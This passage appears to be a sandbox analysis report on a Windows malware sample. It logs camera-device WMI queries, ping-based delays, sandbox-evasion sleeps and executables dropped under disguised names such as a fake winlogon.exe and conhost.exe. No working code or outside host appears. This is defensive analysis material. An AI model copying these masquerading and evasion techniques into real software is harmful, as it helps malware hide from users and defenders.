                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Uses ping.exe to sleep
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMemory allocated: 1B410000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeMemory allocated: 1A880000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeMemory allocated: 930000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeMemory allocated: 1A690000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeMemory allocated: 1AD70000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeMemory allocated: 1AAE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMemory allocated: 1040000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMemory allocated: 1AC60000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMemory allocated: 13C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMemory allocated: 1B1D0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeMemory allocated: 2BC0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeMemory allocated: DB0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeMemory allocated: 1AB90000 memory reserve | memory write watch
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeMemory allocated: 2780000 memory reserve | memory write watch
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeMemory allocated: 1A870000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeMemory allocated: E50000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeMemory allocated: 1A930000 memory reserve | memory write watch
                            Source: C:\Users\Public\AccountPictures\winlogon.exeMemory allocated: 2F20000 memory reserve | memory write watch
                            Source: C:\Users\Public\AccountPictures\winlogon.exeMemory allocated: 1B1C0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeMemory allocated: 2E80000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeMemory allocated: 1B180000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMemory allocated: 1280000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMemory allocated: 1AD50000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\AccountPictures\winlogon.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 599781
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598843
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598625
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598500
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598343
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 3600000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597578
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597359
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597208
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597068
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596906
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596761
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596640
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 300000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596468
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596347
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596218
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596108
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595988
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595859
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595721
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595580
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595125
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594822
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594669
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594495
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594387
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594278
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594171
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594062
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593950
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593842
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593734
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593625
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593509
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593399
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593296
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593187
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593078
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592968
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592859
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592726
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592512
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591978
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591858
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591749
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591640
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591528
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591420
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591309
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591177
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591048
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590916
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590773
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590656
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590546
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590437
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590326
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590201
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590093
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1582
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1521
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2088
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1549
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1641
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2198
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWindow / User API: threadDelayed 5667
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWindow / User API: threadDelayed 4038
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\xWYkXXxo.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\hEXMkWTV.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\OuwhFfWF.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\exZDPEZZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\JzShoUtR.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\hMjNZkhU.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\YdQxpHbm.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\nocldQFM.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 7616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe TID: 7828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe TID: 7844Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exe TID: 8320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exe TID: 8336Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 1582 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -9223372036854770s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep count: 1521 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -12912720851596678s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 2088 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 1549 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 1641 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -11068046444225724s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep count: 2198 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 8352Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 8344Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe TID: 8328Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe TID: 8332Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exe TID: 8384Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe TID: 8444Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\Public\AccountPictures\winlogon.exe TID: 8640Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 8936Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -34126476536362649s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -599781s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -598843s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -598625s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -598500s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -598343s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9044Thread sleep time: -7200000s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -597578s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -597359s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -597208s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -597068s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596906s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596761s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596640s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9044Thread sleep time: -300000s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596468s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596347s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596218s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596108s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595988s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595859s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595721s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595580s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595125s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594822s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594669s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594495s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594387s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594278s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594171s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594062s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593950s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593842s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593734s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593625s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593509s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593399s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593296s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593187s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593078s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -592968s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -592859s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -592726s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -592512s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591978s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591858s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591749s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591640s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591528s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591420s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591309s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591177s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591048s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590916s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590773s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590656s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590546s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590437s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590326s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590201s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590093s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 9140Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Public\AccountPictures\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile Volume queried: C:\ FullSizeInformation
